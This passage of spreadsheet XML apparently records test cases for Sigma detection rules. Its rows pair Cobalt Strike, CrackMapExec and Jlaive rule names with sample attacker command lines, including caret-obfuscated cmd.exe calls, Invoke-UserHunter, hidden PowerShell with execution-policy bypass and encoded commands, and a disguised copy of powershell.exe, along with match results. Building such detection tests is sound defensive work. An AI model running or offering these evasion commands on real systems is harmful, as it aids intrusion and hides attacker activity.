          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2429" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" echo m^ake_token</t>
        </is>
      </c>
      <c r="F2429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2429" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2429" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2429" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2430" ht="15.75" customHeight="1" s="42">
      <c r="A2430" s="43" t="n"/>
      <c r="B2430" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2430" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2430" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2430" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C echo m^ake_token</t>
        </is>
      </c>
      <c r="F2430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2430" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2430" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2430" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2430" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2430" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2431" ht="15.75" customHeight="1" s="42">
      <c r="A2431" s="43" t="n"/>
      <c r="B2431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2431" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2431" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2431" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" p^sinject</t>
        </is>
      </c>
      <c r="F2431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2431" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2431" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2431" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2431" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2431" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2432" ht="15.75" customHeight="1" s="42">
      <c r="A2432" s="43" t="n"/>
      <c r="B2432" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C2432" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D2432" s="44" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E2432" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" p^sinject</t>
        </is>
      </c>
      <c r="F2432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2432" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2432" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2432" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands (647c7b9e-d784-4fda-b9a0-45c565a7b729)</t>
        </is>
      </c>
      <c r="J2432" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2432" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2433" ht="15.75" customHeight="1" s="42">
      <c r="A2433" s="43" t="n"/>
      <c r="B2433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2433" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2433" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2433" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "I^nvoke-UserH^unter"</t>
        </is>
      </c>
      <c r="F2433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2433" s="43" t="n"/>
      <c r="J2433" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2433" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2434" ht="15.75" customHeight="1" s="42">
      <c r="A2434" s="43" t="n"/>
      <c r="B2434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2434" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2434" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2434" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "I^nvoke-UserH^unter"</t>
        </is>
      </c>
      <c r="F2434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2434" s="43" t="n"/>
      <c r="J2434" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2434" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2435" ht="15.75" customHeight="1" s="42">
      <c r="A2435" s="43" t="n"/>
      <c r="B2435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2435" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2435" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2435" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2435" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2435" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2435" s="44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35" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2435" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2436" ht="15.75" customHeight="1" s="42">
      <c r="A2436" s="43" t="n"/>
      <c r="B2436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2436" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2436" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2436" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2436" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2436" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2436" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2436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36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2436" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2437" ht="15.75" customHeight="1" s="42">
      <c r="A2437" s="43" t="n"/>
      <c r="B2437" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2437" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2437" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2437" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2437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37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2437" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2438" ht="15.75" customHeight="1" s="42">
      <c r="A2438" s="43" t="n"/>
      <c r="B2438" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2438" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2438" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2438" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2438" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2438" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2438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38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2438" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2439" ht="15.75" customHeight="1" s="42">
      <c r="A2439" s="43" t="n"/>
      <c r="B2439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2439" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2439" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2439" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2439" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2439" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2439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39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2439" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2440" ht="15.75" customHeight="1" s="42">
      <c r="A2440" s="43" t="n"/>
      <c r="B2440" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C2440" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D2440" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E2440" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F2440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2440" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2440" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2440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2440" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2440" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2441" ht="15.75" customHeight="1" s="42">
      <c r="A2441" s="43" t="n"/>
      <c r="B2441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2441" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2441" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2441" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F2441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2441" s="43" t="n"/>
      <c r="J2441" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2441" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2442" ht="15.75" customHeight="1" s="42">
      <c r="A2442" s="43" t="n"/>
      <c r="B2442" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2442" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2442" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2442" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F2442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2442" s="43" t="n"/>
      <c r="J2442" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2442" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2443" ht="15.75" customHeight="1" s="42">
      <c r="A2443" s="43" t="n"/>
      <c r="B2443" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2443" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2443" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2443" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt whoami</t>
        </is>
      </c>
      <c r="F2443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2443" s="43" t="n"/>
      <c r="J2443" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2443" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2444" ht="15.75" customHeight="1" s="42">
      <c r="A2444" s="43" t="n"/>
      <c r="B2444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2444" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2444" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2444" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -noni -w 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F2444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2444" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2444" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2444" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2445" ht="15.75" customHeight="1" s="42">
      <c r="A2445" s="43" t="n"/>
      <c r="B2445" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2445" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2445" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2445" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -noni -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F2445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2445" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2445" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2445" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2446" ht="15.75" customHeight="1" s="42">
      <c r="A2446" s="43" t="n"/>
      <c r="B2446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2446" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2446" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2446" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOP -noni -W 1 -exec bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F2446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2446" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2446" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2446" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2447" ht="15.75" customHeight="1" s="42">
      <c r="A2447" s="43" t="n"/>
      <c r="B2447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2447" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2447" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2447" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F2447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2447" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2447" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2447" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2447" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2448" ht="15.75" customHeight="1" s="42">
      <c r="A2448" s="43" t="n"/>
      <c r="B2448" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2448" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2448" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2448" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F2448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2448" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2448" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2448" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2448" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2449" ht="15.75" customHeight="1" s="42">
      <c r="A2449" s="43" t="n"/>
      <c r="B2449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2449" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2449" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2449" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F2449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2449" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J2449" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2449" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2450" ht="15.75" customHeight="1" s="42">
      <c r="A2450" s="43" t="n"/>
      <c r="B2450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2450" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2450" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2450" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F2450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2450" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J2450" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2450" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2451" ht="15.75" customHeight="1" s="42">
      <c r="A2451" s="43" t="n"/>
      <c r="B2451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C2451" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D2451" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E2451" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"C" "whoami" &gt; C:\Users\Public\output.txt 2&gt; nul</t>
        </is>
      </c>
      <c r="F2451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2451" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Whoami.EXE Execution With Output Option (c30fb093-1109-4dc8-88a8-b30d11c95a5d)</t>
        </is>
      </c>
      <c r="J2451" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2451" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2452" ht="15.75" customHeight="1" s="42">
      <c r="A2452" s="43" t="n"/>
      <c r="B2452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2452" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2452" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2452" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "script.bat " &amp;&amp; xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\script.bat.exe*</t>
        </is>
      </c>
      <c r="F2452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2452" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2452" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2452" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2452" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2453" ht="15.75" customHeight="1" s="42">
      <c r="A2453" s="43" t="n"/>
      <c r="B2453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2453" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2453" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2453" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "script.bat " &amp;&amp; xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\script.bat.exe*</t>
        </is>
      </c>
      <c r="F2453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2453" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2453" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2453" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2453" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2454" ht="15.75" customHeight="1" s="42">
      <c r="A2454" s="43" t="n"/>
      <c r="B2454" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2454" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2454" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2454" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" script.bat &amp;&amp; copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\script.bat.exe</t>
        </is>
      </c>
      <c r="F2454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2454" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2454" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2454" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2455" ht="15.75" customHeight="1" s="42">
      <c r="A2455" s="43" t="n"/>
      <c r="B2455" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2455" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2455" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2455" s="44" t="inlineStr">
        <is>
